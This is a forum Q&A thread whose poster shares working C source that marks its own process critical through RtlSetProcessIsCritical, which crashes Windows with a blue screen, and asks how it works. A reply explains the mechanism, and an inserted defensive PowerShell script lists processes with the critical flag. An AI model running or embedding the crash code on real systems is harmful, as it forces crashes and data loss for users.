Programming

   h@cking2013
Blue screen source

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_programming&no=6450


Hello.
I happened to come across some source code on the internet that triggers a blue screen.

#include <windows.h>

/* Undocumented ntdll export: sets the process's "break on termination" flag
   (the same thing NtSetInformationProcess(ProcessBreakOnTermination) does).
   Once the flag is set, exiting the process bugchecks the machine with
   CRITICAL_PROCESS_DIED, which is the blue screen this program triggers.
   The real function returns an NTSTATUS; this code ignores it. */
typedef VOID (__stdcall *RtlSetProcessIsCritical)(
    IN  BOOLEAN  NewValue,     /* TRUE = mark critical, FALSE = clear */
    OUT PBOOLEAN OldValue,     /* receives the previous value, may be NULL */
    IN  BOOLEAN  IsWinlogon);  /* only winlogon sets this; FALSE here */

/* Enable a privilege in the current process token. SeDebugPrivilege is needed
   for RtlSetProcessIsCritical to succeed, so the program must run elevated. */
BOOL EnablePriv(LPCTSTR lpszPriv)
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    if (!LookupPrivilegeValue(NULL, lpszPriv, &luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    /* AdjustTokenPrivileges returns TRUE even when the token does not hold the
       privilege at all; that case is only reported through GetLastError(). */
    if (bRet && GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        bRet = FALSE;
    CloseHandle(hToken);
    return bRet;
}

/* Mark the current process critical. Returns TRUE on success. */
BOOL ProtectProcess(void)
{
    HMODULE hDLL;
    RtlSetProcessIsCritical fSetCritical;

    /* ntdll.dll is already mapped into every process; LoadLibrary just bumps
       its reference count and returns the module handle. */
    hDLL = LoadLibraryA("ntdll.dll");
    if (hDLL == NULL)
        return FALSE;

    if (!EnablePriv(SE_DEBUG_NAME))
        return FALSE;

    /* The function is not in any import library, so resolve it by name. */
    fSetCritical = (RtlSetProcessIsCritical)GetProcAddress(hDLL, "RtlSetProcessIsCritical");
    if (fSetCritical == NULL)
        return FALSE;

    fSetCritical(TRUE, NULL, FALSE);
    return TRUE;
}

int main(void)
{
    /* Once ProtectProcess() succeeds the process is critical; returning from
       main() terminates it, and the kernel answers with a bugcheck (BSOD). */
    ProtectProcess();
    return 0;
}

How does it work?

Hits: 6648     Date: 2014/03/23 03:12



MainThread: It obtains the RtlSetProcessIsCritical function from the DLL referenced by hDLL.
- RtlSetProcessIsCritical is a function for creating a critical process.
- A critical process (Critical Process) is a process that is not terminated; in other words, a process that causes a blue screen.

If you want to know more about GetProcAddress, refer to MSDN.
From MainThread
2014/05/24
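The posted program flips the flag from the inside. The check a responder wants is the reverse: which processes on a box already carry that flag, since anything outside the handful Windows marks critical itself is a process that has made itself unkillable. The following is an added example, not code from the original post or from hackerschool.org; it assumes the documented NtQueryInformationProcess export with information class ProcessBreakOnTermination (29), which returns a 4-byte ULONG, and it must be run from an elevated PowerShell session because querying most processes needs a handle an ordinary user cannot open.

```powershell
# Added example (not from the original post): list processes whose
# ProcessBreakOnTermination flag is set, i.e. processes marked critical the
# way the posted program marks itself. Run from an elevated session.
$ntdll = @'
using System;
using System.Runtime.InteropServices;
public static class NtProc {
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr ProcessHandle,
        int    ProcessInformationClass,
        out uint ProcessInformation,
        int    ProcessInformationLength,
        out int ReturnLength);
}
'@
# Add-Type fails if the type already exists in this session, so guard it.
if (-not ('NtProc' -as [type])) { Add-Type -TypeDefinition $ntdll }

$ProcessBreakOnTermination = 29   # PROCESSINFOCLASS value; the flag is a ULONG

function Get-CriticalProcess {
    foreach ($p in Get-Process) {
        # Protected and some system processes refuse a full-access handle;
        # skip those rather than abort the scan.
        try { $h = $p.Handle } catch { continue }
        $flag = [uint32]0
        $len  = 0
        $status = [NtProc]::NtQueryInformationProcess($h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$len)
        # STATUS_SUCCESS is 0; a non-zero flag means the process is critical.
        if ($status -eq 0 -and $flag -ne 0) {
            [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName }
        }
    }
}

Get-CriticalProcess | Format-Table -AutoSize
```

On a stock system the output is a short list of Windows's own processes, such as csrss.exe and wininit.exe, which the OS marks critical at boot. Any other entry, especially one from a user-writable path, is exactly the situation the posted program creates: killing it takes the machine down, so the sensible response is to suspend it, investigate, and clear the flag with NtSetInformationProcess(ProcessBreakOnTermination, 0) before terminating it.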
h@cking2013: Thank you! 2014/07/30
Kim Byung-kwon: A long time ago someone on NateOn told me to try putting a blue screen up on the display...
I remember that. Thanks for the good info... lol
2015/02/01
Kim Byung-kwon: Even though it has been about 6 years, I still remember it lol 2015/02/01
somass: Thank you 2022/09/16

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org